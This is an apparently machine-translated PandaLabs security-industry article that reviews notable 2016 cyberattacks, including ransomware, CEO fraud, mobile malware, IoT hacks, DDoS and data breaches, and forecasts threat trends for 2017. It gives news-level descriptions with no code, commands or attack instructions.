Forecasts for 2017: less malware, but more effective attacks

The year 2016 is coming to an end, when we saw in abundance loud attacks from which large companies and private users suffered. The attacks of encryptors such as Petya, Gugi-type Trojans for Android, spies similar to Pegasus, PunkeyPOS, or large-scale attacks aimed at payment terminals, along with recent DDoS attacks, have caused enormous damage to large corporations and international communication networks.

The PandaLabs anti-virus laboratory of Panda Security presents a list of what we should expect in the coming 2017.

ANALYSIS

This year began with more than 20 million new malware samples detected and neutralized in PandaLabs (an average of 227,000 per day). This is slightly more than in the first quarter of 2015 (an average of 225,000 per day). During 2016, we saw how the number of new samples was a little less than a year earlier: on average, up to 200,000 per day. Although attacks have become more effective.
')
Cyber ​​criminals have become increasingly self-reliant, and even though we are finishing the year with more optimistic indicators, we still cannot lose our vigilance. Hackers concentrate their efforts on more profitable attacks, improving their tactics, which allows them to get quick and easy money more efficiently.

Hackers turned their attention to organizations that process huge amounts of data, especially personal information (hospitals, pharmaceuticals, hotels, etc.). As soon as they gain access to such organizations, they infect as many computers as possible with the help of coders, as a result of which they can demand any money from their victims in the form of ransom or sell this data on the black market.

If something has not changed this year, it is a class of the most popular malicious programs - we are talking about Trojans, which, together with cryptographers, have remained at the top of the “rating” for many years.

ATTACK RATING 2016

Ciphers

We know that cryptographers are a serious business for cyber criminals, but it is incredibly difficult to measure with a high degree of certainty. We have seen the evolution of such attacks, along with such improvements as the direct chat of the victim with hackers to "discuss" payments. Techniques have also become more sophisticated, and sometimes they are especially aggressive, as is the case with Petya, which instead of encrypting documents immediately hits the main boot record (MBR) of the computer and makes it unsuitable until the ransom is paid.

Also, we are increasingly seeing abuse of the PowerShell system utility (which we predicted in the PandaLabs annual report for 2015), which is installed by default in Windows 10 and is often used in attacks to prevent detection from the security solutions installed on victims' computers.

In the second quarter, we saw one of the strangest coder attacks on a company from Slovenia. Her head of security received a letter from Russia informing that their network was hacked, and soon a cryptographer will be running on all of their computers if they don’t pay about 9000 euros (in bitcoins) within 3 days. To prove their access to the network, hackers sent them a list of all devices connected to the company's internal network.

Of course, many victims chose to pay a ransom, although data recovery is not guaranteed. In the third quarter, we observed higher levels of specialization in attacks by cryptographers.

The best example of this was shown by the creators of the crypt users Petya and Mischa, who specialized in the development of malware and related payment platforms, referring distribution issues to third parties - this practice was called Ransom as a Service (RaaS) . In fact, after they did their part, they attracted distributors to infect the victims. Everything is like in a legal business: the profit of distributors depends on the amount of "earned" money. The higher the sales, the higher the percentage they receive.

Malicious Mail

Attacks come not only from malicious advertising or hacked sites. A huge number of attacks are still carried out via e-mail in the form of false accounts or various notifications.

A similar attack was carried out in at least two European countries - in Poland and Spain, where hackers used to pose as local electrical companies. In their message there were no attachments, but there was only billing information in the form of text and a link to view more detailed information.

The trick consisted in exorbitantly high amounts in the bill, which made the recipient indignant and, without thinking, click on the link to view the details. When you click on the link, the user went to a false site, much like the real site of the power company serving him, where he could download the bill. If the client downloaded and opened the file, then he was infected by the coder.

Intracorporate phishing

This type of attack is rapidly gaining popularity. Hackers allegedly on behalf of the president or chief financial officer of the company request a transfer from an employee. Before doing this, they study the work of the company from the inside, receiving information about their victims through social networks, which makes their scam more believable.

A prime example of this year is the incident at Mattel , the famous producer of Barbies and Hot Wheels.



A senior manager received a message from a newly appointed company executive with a task to transfer $ 3 million to a bank account in China. After the transfer was completed, he informed the manager that everything was done. He was stunned by this, because he did not give him any transfer assignment. They urgently appealed to the US government and the bank, but it was too late, because money has already been transferred.

However, they were lucky: the bank in China had a day off, and therefore they had enough time to warn the Chinese authorities. The account was frozen, and Mattel managed to get his money back.

Mobile devices

SNAP is one of the most popular vulnerabilities of this year. LG G3 mobile phones have suffered from it. The problem was caused by an error in the Smart Notice application that grants the right to run any JavaScript. BugSec discovered this vulnerability and reported it to LG, which promptly published a patch to fix the problem.



Gugi, a trojan for Android , managed to overcome security barriers in Android 6 to steal bank registration data from applications installed on the phone. For this, over the window of a legitimate application

Gugi overlaid his window by requesting the user's banking data, which without his knowledge was sent directly to the cyber criminals.

In August, Apple released an urgent update of its operating system for iOS 9.3.5 mobile devices. It eliminated three “zero-day” vulnerabilities used by spyware, known as Pegasus , developed by the Israeli company NGO Group, which produces products similar to the solutions of Hacking Team.

Internet of things

The automotive sector is highly at risk. Employees of the University of Birmingham showed how they can break open the locking system of any car sold by the Volkswagen Group over the past 20 years. Charlie Miller and Chris Valasek, who had previously cracked the Jeep Cherokee, went even further and showed how they could manipulate the throttle, brakes and even the steering of a moving car.

Smart homes are also vulnerable to cyber attacks. Researcher Andrew Tierney showed the thermostat hacking method he developed. After he was able to gain control of him (by inserting an SD card into it), he raised the temperature to 99 degrees Fahrenheit and requested a PIN to deactivate. The thermostat connected to the IRC channel, providing the MAC address as an identifier for each compromised device. Bitcoin was requested from the user in exchange for a PIN code that changed every 30 seconds.

Cyber ​​war

In the field of cyber wars, 2016 showed that the United States decided to go on the attack, admitting the launch of cyber attacks on ISIS. Robert Wark, US Under Secretary of Defense, made this very clear in an interview with CNN.

In June , South Korean authorities opened an attack from the DPRK . Presumably, the attack began about a year ago, and its main goal was 140,000 computers belonging to organizations and government agencies, as well as defense enterprises. But this attack was discovered only in February of this year. According to the police, over 42,000 documents were stolen, of which 95% were related to defense issues, such as, for example, documents on plans and specifications for the F35 fighter.

In the midst of the US presidential election, one of the most topical incidents found was the disclosure of the attack on the US Democratic National Commettee, which resulted in a huge amount of data stolen from the public.



Continuing the topic of elections, the FBI warned of the discovery of two attacks on websites related to elections. At the same time, at least one of the hackers (a foreigner) was able to de-register some voters.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some types of stolen “cyber-weapons”, promising to sell the rest of the samples.

Cyber ​​crime

In June, the criminal, dubbed the "Lord of Darkness", put up for sale on the black market information about the patients of the three institutions from the United States.

He stole information about more than 650,000 patients and requested about 700,000 US dollars for them. Shortly thereafter, he put up for sale personal data of 9.3 million clients of the health insurance agency for 750 bitcoins (about 0.5 million dollars).
In recent months, Dropbox has also become a victim of cyber criminals. Recently it became known that the popular file sharing service was attacked in 2012.

The bottom line: data theft of 68 million users.

But if what kind of robbery and talk, then it's about the incident with Yahoo. Although it occurred back in 2014, but this has become known recently. Total has been compromised
500 million accounts, which was the largest theft in history.



On August 2, one of the largest Bitcoin thefts in history occurred. The company Bitfinex, which is engaged in trading and exchange of cryptocurrency, was the victim of an attack, as a result of which an amount equal to 60 million dollars was stolen.

This money belonged to customers who kept their bitcoins in this “bank”.
There is still no evidence pointing to the criminals, and the company has not yet provided any information about what happened, because law enforcement agencies are still investigating.

DDoS attacks

In September, well-known security journalist Brian Krebs revealed vDOS, the “company” that offered DDoS attacks. Shortly thereafter, the organizers were arrested, who over the course of 2 years conducted 150,000 attacks and earned 618 thousand dollars.

Then the Krebs website underwent a crushing DDoS attack that turned it off for a week. In the end, Google, as part of its Project Shield, managed to protect its website, after which it was again available online.

In the last quarter of the year, there was a wave of large-scale cyber attacks against the American Internet provider DynDNS, from which the websites of many large global corporations and international communication tools, such as Netflix, Twitter, Amazon and The New York Times, suffered.

The service was interrupted for almost 11 hours, which affected over a billion users.

POS-terminals and bank cards

Wendy's, a popular fast-food chain, has been infected with more than 1000 of its PoS terminals by malware, which has stolen information about its customers' bank cards.

PandaLabs discovered this attack using the well-known PunkeyPOS threat, which has been used to infect over 200 restaurants in the United States. Another similar attack was discovered by our laboratory this year. Restaurants in the United States suffered again: about 300 institutions whose POS terminals were infected with the help of the PosCardStealer malware.

Financial institutions

This year, the Central Bank of Bangladesh was the victim of an attack, during which transfers of $ 1 billion were made.

Fortunately, we managed to block most of these transfers, although the criminals still managed to steal about $ 81 million.
Soon after, we observed two more similar cases: one was against a bank in Vietnam, and the second was against a bank in Ecuador.

Social networks

Security 117 million users of LinkedIn was at risk after the list of email addresses and their corresponding password hashes was published.

32 million logins and passwords of Twitter users were put up for sale for about $ 6,000.

This social network denies that account information was obtained from their servers. In fact, the passwords were presented in the form of text and most of them belonged to users from Russia, and there is a suspicion that they were obtained as a result of phishing or using Trojans.

By the way, MySpace was attacked, although it is practically not used anymore. The attack occurred in 2013, although nothing was known about her until May of this year. User names, passwords and email addresses have been stolen from approximately 360 million users.

An injured user may not use MySpace for years, but if he has a habit of using the same password, now is the time to give it up and enable two-step authorization.

Using two-step authorization, creating complex passwords and banning the use of identical passwords on different websites - these are basic information security tips that should be taken into account.

WHICH CYBER-NIGHTMARES PREPARE US 2017 YEAR?

Ciphers

During 2016, they were in the spotlight, and most likely it will be in 2017 too. In some ways, this type of attack has replaced other, more traditional ways of stealing information. Cipher operators make it much easier to “earn” money, eliminating middlemen and unwanted risks.

Attacks on the company

Attacks on companies will be more numerous and complex.
Companies have already become a prime target for cyber criminals. Their information is more valuable compared to the data of private users.

Cyber ​​criminals are always looking for weaknesses in corporate networks to penetrate them. After that, they get access to resources that contain the desired information. They can also launch large-scale attacks with the help of encryptors infecting all available devices, in order to later request astronomical sums of money for data recovery.

Internet of things

The Internet of Things (IoT) is the next information security nightmare. Any kind of devices connected to the network can be used to penetrate corporate networks. Most of these devices do not have the proper level of security.

As a rule, they do not receive automatic security updates, use weak passwords, and often the same default passwords are used on thousands of devices, etc. All this together makes them very vulnerable to external attacks.

DDoS

In the last months of 2016, we witnessed the most powerful DDoS attacks in history. They began in September with an attack on Brian Krebs after he reported on the activities of an Israeli company that offers services to launch such attacks.

Another major attack was carried out against the French company OVH (traffic - up to 1 TB / s), and another one against the American company Dyn, which left several major Internet giants without Internet services.

These attacks were carried out by botnets based on thousands of infected IoT devices (IP cameras, routers, etc.). We can be sure that in 2017 we will see an increase in the number of such attacks, which are usually used to damage the business reputation of companies or to block its activities (blocking access to the Internet, making it difficult to sell online, etc.).

Cell phones

Here the goal is quite clear: the most will get Android devices. It's no secret that Android has the largest market share, and this operating system is installed on most devices. Apple maintains a modest share of iOS, while the rest of the systems have a small market share. Cyber ​​criminals will find it easier to focus on a single operating system in order to maximize profits.



Solving the problem depends not only on what Android can do with timely updates, but also on how each mobile device manufacturer decides when and how to include them in its package (if at all). Given the number of incidents that occur every month, this situation only increases the risks for users.

Cyber ​​war

We are experiencing one of the most difficult stages in the development of international relations in recent years: the threat of trade wars, espionage, confrontation between leading powers. All this, of course, can have serious and serious consequences in the field of cyber security.

Governments of different countries seek to access even more information (at a time when encryption is becoming increasingly popular), and therefore the security services will be even more interested in receiving information that can benefit the industry of their countries.

Such a global trend may impede data-sharing initiatives that large companies are already exchanging in order to better protect themselves against cyber-criminals by implementing standards and international rules of interaction.